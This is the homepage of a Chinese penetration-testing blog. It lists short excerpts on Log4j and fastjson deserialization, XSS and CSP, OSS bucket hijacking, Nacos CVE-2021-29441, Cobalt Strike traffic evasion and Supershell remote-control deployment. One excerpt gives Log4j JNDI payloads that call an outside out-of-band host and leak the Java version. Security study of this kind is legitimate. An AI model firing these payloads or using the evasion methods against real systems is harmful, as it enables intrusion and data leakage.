会员
周边
众包
新闻
博问
闪存
赞助商
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
Linkpoc
博客园
首页
新随笔
联系
订阅
管理
随笔 - 68
文章 - 0
评论 - 9
阅读 -
50627
[置顶]
关于我 About Me
摘要: 本博客主要用于个人经验积累和知识分享,如有描述错误问题,请大佬在评论区中指正。 若您利用文章内的技术手段进行任何非法行为,您需自行承担相应后果,作者将不承担任何法律及连带责任。 LinkPoc 出生于2001年,毕业于福州某不知名大学 && 现任职北京某数字厂商,是一名 CTFer && 白帽 。
阅读全文
posted @ 2021-12-08 23:16 LinkPoc
阅读(209)
评论(0)
推荐(0)
2025年3月25日
log4j、fastjson到底算反序列化漏洞还是JNDI注入漏洞?
摘要: 结论:log4j是JNDI注入漏洞,可利用漏洞导致反序列化。 而fastjson是反序列化漏洞,可利用漏洞加载JNDI类。 JNDI(Java Naming and Directory Interface)是 Java 提供的一种 API,用于访问命名和目录服务(如 LDAP、RMI、DNS 等)
阅读全文
posted @ 2025-03-25 12:52 LinkPoc
阅读(95)
评论(0)
推荐(0)
2025年3月24日
CSP安全策略与XSS漏洞的关系
摘要: CSP与XSS漏洞的关系 1、CSP不依赖漏洞的存在: 2、CSP是独立的安全机制,其有效性取决于策略本身的严格性,而非漏洞是否存在。 例如: 严格CSP(基于nonce):即使站点存在XSS漏洞,攻击者也无法伪造合法的 nonce 值来执行脚本。 宽松CSP(允许unsafe-inline):若漏
阅读全文
posted @ 2025-03-24 15:34 LinkPoc
阅读(63)
评论(0)
推荐(0)
2024年6月14日
阿里云OSS存储桶Bucket 劫持漏洞
摘要: fofa搜索语句:product="AliyunOSS" && body="NoSuchBucket" 访问https://xxx.oss-ap-south-1.aliyuncs.com/ 发现 <Code>NoSuchBucket</Code> <HostId>pkdyxxxx.img-cn-ho
阅读全文
posted @ 2024-06-14 17:16 LinkPoc
阅读(650)
评论(0)
推荐(0)
2024年6月5日
23年9月-24年6月公开漏洞整理
该文被密码保护。
阅读全文
posted @ 2024-06-05 16:00 LinkPoc
阅读(3)
评论(0)
推荐(0)
2024年2月28日
Cobalt Strike特征隐藏和流量加密
摘要: Cobalt Strike特征隐藏和流量加密 因用公司办公网络做安全测试而被XDR捕捉到流量特征故有此篇。 悲报,还被提交了工单。 做安全测试不要用公司网!不要用公司网!不要用公司网! 服务器开启禁Ping 命令: vim /etc/sysctl.conf 添加一行 net.ipv4.icmp_ec
阅读全文
posted @ 2024-02-28 11:28 LinkPoc
阅读(1143)
评论(0)
推荐(0)
2023年12月21日
Nacos未授权 CVE-2021-29441
摘要: Nacos未授权 CVE-2021-29441 环境搭建 环境dockerfile在文末 环境启动 docker-compose up -d 查看下当前的容器 docker ps 漏洞复现 访问Web页面 127.0.0.1:8848 抓包,访问http://127.0.0.1:8848/nacos
阅读全文
posted @ 2023-12-21 15:23 LinkPoc
阅读(271)
评论(0)
推荐(0)
2023年9月21日
Supershell远控部署
摘要: 今天搭建了一下supershell,蛮好用的,推荐一手。 GITHUB地址:https://github.com/tdragon6/Supershell 部署 首先必须要先有一台自己的公网服务器,可以考虑阿里云,腾讯云,华为云,百度云之类的。 然后就开始搭建! 输入命令行,下载解压源码 wget h
阅读全文
posted @ 2023-09-21 18:40 LinkPoc
阅读(1993)
评论(0)
推荐(0)
2023年9月13日
中电安科一、二面
摘要: 蛮简单的,拿下offer 中电安科一面 这是一家偏向工控的安全公司 自我介绍 web比较熟的漏洞有哪些?最熟的是哪个? 文件上传呢? 反序列化漏洞了解过吗? 提权接触过吗? 协议通信了解过吗? 你对工控安全有了解吗? 对病毒有多什么研究吗? 可以介绍一下XSS吗? 拒绝服务攻击和分布式拒绝服务攻击有
阅读全文
posted @ 2023-09-13 23:32 LinkPoc
阅读(116)
评论(0)
推荐(0)
2023年9月12日
360安全研究一、二面
摘要: 360安全研究一面 ps:中间一半的时候才开始录的,整理了一下后半段的面试问题。中间一半的时候才开始录的,整理了一下后半段的面试问题。 自我介绍 sqlmap针对时间盲注该用什么参数? MSF使用上的流程? 你经常用MSF的用来做什么? 内网里不出网,如何搭建隧道? 如果说内网里拿到层层主机,如何配
阅读全文
posted @ 2023-09-12 18:24 LinkPoc
阅读(184)
评论(0)
推荐(0)
2023年9月8日
关于面试常问到的几种Java反序列化
摘要: 更新一下笔记中JAVA的几个知名的反序列化漏洞,仅漏洞poc和原理,无分析过程。 Log4j 条件:出网(因为需要请求jndi服务器) ${jndi:ldap://yuvs2b.ceye.io} //外带请求 ${jndi:ldap://${java:version}.f2478a5a.ipv6.1
阅读全文
posted @ 2023-09-08 17:50 LinkPoc
阅读(538)
评论(0)
推荐(0)
下一页
公告
<
2025年7月
>
日
一
二
三
四
五
六
29
30
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
1
2
3
4
5
6
7
8
9
搜索
常用链接
我的随笔
我的评论
我的参与
最新评论
我的标签
最新随笔
1.log4j、fastjson到底算反序列化漏洞还是JNDI注入漏洞?
2.CSP安全策略与XSS漏洞的关系
3.阿里云OSS存储桶Bucket 劫持漏洞
4.23年9月-24年6月公开漏洞整理
5.Cobalt Strike特征隐藏和流量加密
6.Nacos未授权 CVE-2021-29441
7.Supershell远控部署
8.中电安科一、二面
9.360安全研究一、二面
10.关于面试常问到的几种Java反序列化
随笔分类
(168)
无线渗透(3)
网络安全(63)
CTFer(11)
CTFshow(4)
Tools(8)
Python(4)
JAVA(5)
云部署工具(4)
Spring(4)
nday(13)
Kali(3)
Docker(3)
内网渗透(6)
权限提升、维持(4)
代码审计(3)
XSS(6)
bypass(5)
漏洞挖掘(6)
漏洞证书(4)
面试(6)
人间烟火(2)
CRYPTO(1)
随笔档案
(68)
2025年3月(2)
2024年6月(2)
2024年2月(1)
2023年12月(1)
2023年11月(1)
2023年9月(7)
2023年8月(2)
2023年6月(1)
2023年5月(5)
2023年2月(1)
2022年10月(3)
2022年7月(1)
2022年6月(2)
2022年5月(1)
2022年3月(5)
2022年2月(5)
2022年1月(11)
2021年12月(5)
2021年11月(1)
2021年10月(6)
2021年9月(1)
2021年5月(1)
2021年3月(2)
2021年2月(1)
阅读排行榜
1. CNVD 原创漏洞证书(4143)
2. 分享开源项目--wifi爆破脚本(Python)(3475)
3. 浅谈最近闹得火热的Log4j RCE漏洞(3252)
4. Ueditor 1.4.3 服务器请求伪造分析(2913)
5. CTF中常见RCE命令执行绕过技巧(2897)
6. Springboot未授权访问(2481)
7. 记一次360众测靶场考核(2438)
8. SSH、加密算法(2215)
9. Docker搭建Vulhub遇见的问题及解决方案(2092)
10. Supershell远控部署(1993)
11. Swagger接口泄露(脱敏获取密码)(1903)
12. CTFSHOW-SSRF篇(1191)
13. Cobalt Strike特征隐藏和流量加密(1143)
14. Sqlmap流量分析(osshell)、UA头隐藏(1070)
15. Spring泄露(转载)(1048)
16. 一个有意思的双层内网渗透实验(946)
17. go环境安装与fscan编译(945)
18. 子域名接管漏洞(862)
19. fofaviewer+python批量扫描弱口令(841)
20. ARL灯塔--计划任务(Cron表达式)(808)
评论排行榜
1. 一个有意思的双层内网渗透实验(2)
2. CTFSHOW-SSRF篇(2)
3. CNVD 原创漏洞证书(2)
4. CTF中常见RCE命令执行绕过技巧(2)
5. Swagger接口泄露(脱敏获取密码)(1)
推荐排行榜
1. CTF中常见RCE命令执行绕过技巧(3)
2. 一个有意思的双层内网渗透实验(2)
3. CTFSHOW-SSRF篇(2)
4. Sqlmap流量分析(osshell)、UA头隐藏(1)
5. 子域名接管漏洞(1)
最新评论
1. Re:CTFSHOW-SSRF篇
师傅你好 这是我的 这个要靠运气哈哈哈
--TinGer2
2. Re:一个有意思的双层内网渗透实验
这个靶场的名字叫什么哇
--EDISONlili
3. Re:CTFSHOW-SSRF篇
那个网站要多尝试几下才会出flag
--xus11
4. Re:记一次双层内网渗透实验
这个实验太长了,太麻烦了作者了
--不负春光不负卿
5. Re:Swagger接口泄露(脱敏获取密码)
大佬,swagger 页面如何脱敏
--皂河
点击右上角即可分享